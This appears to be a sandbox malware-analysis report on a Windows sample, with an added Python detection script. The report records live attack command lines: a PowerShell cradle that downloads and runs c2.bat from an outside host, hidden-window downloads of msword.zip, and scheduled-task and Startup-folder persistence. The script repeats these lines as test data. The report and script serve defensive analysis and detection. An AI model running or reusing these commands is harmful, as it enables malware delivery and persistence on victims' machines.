Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Code function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_004062FC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 36_2_00250315 push cs; retn 0024h36_2_00250318
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 36_2_00220DE6 push ecx; ret 36_2_00220DF9
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 38_2_00EF0DE6 push ecx; ret 38_2_00EF0DF9

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com File created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
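The following Python detection logic is an added example and is not part of the Joe Sandbox report or of the sample. It runs four rules over constructed process-creation and file-creation events modelled on the entries in this report: the mshta.exe to powershell.exe download cradle (Invoke-WebRequest followed by Start-Process on the downloaded c2.bat), the hidden-window Invoke-WebRequest downloads launched from cmd.exe, the schtasks.exe task "Murray" that runs wscript //B on LinkHub.js every 5 minutes, and the LinkHub.url dropped into the Startup folder. The command lines are the ones recorded above; the flat event schema, the two benign explorer.exe control events, and the extra script hosts and file extensions in the rule lists are assumptions that generalise beyond what this report shows.

```python
import re

# Constructed sample events modelled on the process-creation and file-creation
# entries in this report. The command lines are the ones the sandbox recorded;
# the two explorer.exe events are benign controls added for contrast, and the
# flat dict schema is an assumption standing in for Sysmon EID 1/11 fields.
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD_EXE = r"C:\Windows\SysWOW64\cmd.exe"
MSHTA_EXE = r"C:\Windows\SysWOW64\mshta.exe"
EXPLORER_EXE = r"C:\Windows\explorer.exe"  # assumed benign parent

SAMPLE_EVENTS = [
    {"type": "process", "parent": MSHTA_EXE, "image": PS_EXE,
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"'''},
    {"type": "process", "parent": CMD_EXE, "image": PS_EXE,
     "cmdline": r'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"'},
    {"type": "process", "parent": CMD_EXE, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'''schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F'''},
    {"type": "file", "image": CMD_EXE,
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url"},
    {"type": "process", "parent": EXPLORER_EXE, "image": PS_EXE,
     "cmdline": 'powershell -NoProfile -Command "Get-Process | Sort-Object CPU"'},
    {"type": "file", "image": EXPLORER_EXE, "path": r"C:\Users\user\Documents\notes.url"},
]

# Download primitives, execution primitives and hidden-window switches seen in
# PowerShell one-liners; the lists are wider than what this sample uses.
WEB_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
EXEC_AFTER = re.compile(r"start-process|invoke-expression|\biex\b|invoke-item", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
TASK_ACTION = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)   # value of schtasks /tr
TASK_SCHEDULE = re.compile(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh|regsvr32|rundll32)\b", re.I)
# Startup-folder drops; the extension list beyond .url is an assumption.
STARTUP_DROP = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.(url|lnk|js|vbs|bat|cmd)$", re.I)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process(ev):
    """Return (rule, detail) hits for one process-creation event."""
    hits = []
    cmd = ev["cmdline"]
    child, parent = basename(ev["image"]), basename(ev["parent"])
    if child in ("powershell.exe", "pwsh.exe"):
        urls = URL.findall(cmd)
        if parent == "mshta.exe":
            hits.append(("mshta_spawns_powershell", f"parent={parent} urls={urls}"))
        if WEB_DOWNLOAD.search(cmd) and EXEC_AFTER.search(cmd):
            hits.append(("powershell_download_and_execute", f"urls={urls}"))
        if WEB_DOWNLOAD.search(cmd) and HIDDEN_WINDOW.search(cmd):
            hits.append(("hidden_powershell_web_download", f"urls={urls}"))
    if child == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = TASK_ACTION.search(cmd)
        action = (m.group(1) or m.group(2)) if m else ""
        if SCRIPT_HOST.search(action):
            sched = TASK_SCHEDULE.search(cmd)
            hits.append(("schtasks_script_host_persistence",
                         f"action={action!r} schedule={sched.group(0) if sched else 'unknown'}"))
    return hits


def check_file(ev):
    """Return (rule, detail) hits for one file-creation event."""
    if STARTUP_DROP.search(ev["path"]):
        return [("startup_folder_drop", f"path={ev['path']} by={basename(ev['image'])}")]
    return []


def detect(events):
    """Run every rule over a list of events; returns one alert dict per hit."""
    alerts = []
    for i, ev in enumerate(events):
        hits = check_process(ev) if ev["type"] == "process" else check_file(ev)
        alerts.extend({"event": i, "rule": rule, "detail": detail} for rule, detail in hits)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] event {a['event']}: {a['detail']}")
```

To run this against real telemetry, map `parent`, `image` and `cmdline` to the ParentImage, Image and CommandLine fields of Sysmon Event ID 1 (or the equivalent fields of Security Event 4688 with command-line auditing enabled) and `path` to the TargetFilename of Sysmon Event ID 11. The mshta.exe parent rule fires on any PowerShell child because an HTA spawning PowerShell has no common legitimate use; the schtasks rule keys on a script host inside /tr rather than on the task name, since the name ("Murray" here) is arbitrary, and the recorded `/sc minute /mo 5` schedule is what makes this task worth surfacing separately from ordinary logon-time tasks.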

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 36_2_002926DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,36_2_002926DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 36_2_0021FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,36_2_0021FC7C
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 38_2_00F626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_00F626DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com Code function: 38_2_00EEFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00EEFC7C
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
